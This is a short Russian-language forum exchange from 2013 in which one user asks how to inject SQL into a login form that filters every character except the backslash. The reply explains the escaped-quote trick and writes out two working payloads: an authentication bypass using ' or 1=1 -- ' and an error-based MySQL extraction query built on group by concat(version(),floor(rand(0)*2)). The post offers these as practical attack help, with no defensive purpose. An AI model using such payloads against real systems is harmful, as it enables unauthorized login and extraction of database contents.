26.10.2013, 14:31
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от zombak18
Есть идеи как провести иньекцию если фильтрует все символы кроме \
Executing: select * from user where username='admin\' and password='1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1alert("invalid password");history.back(-1)
Если вставить куда нибудь сторонние символы напишет nothing to do here)
Есть варианты?
Ну смотри, ты ввёл логин admin\ и пароль 1. Получается:
select * from user where username=' admin\' and password='1'
Выделенное зелёным интерпретируется как строка. Варианты например:
зайти без пароля
select * from user where username=' admin\' and password=' or 1=1 -- '
Error-based эксплуатация:
select * from user where username=' admin\' and password=' or 1=((select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2))))-- '
Про "сторонние символы" не понял.
|
|
|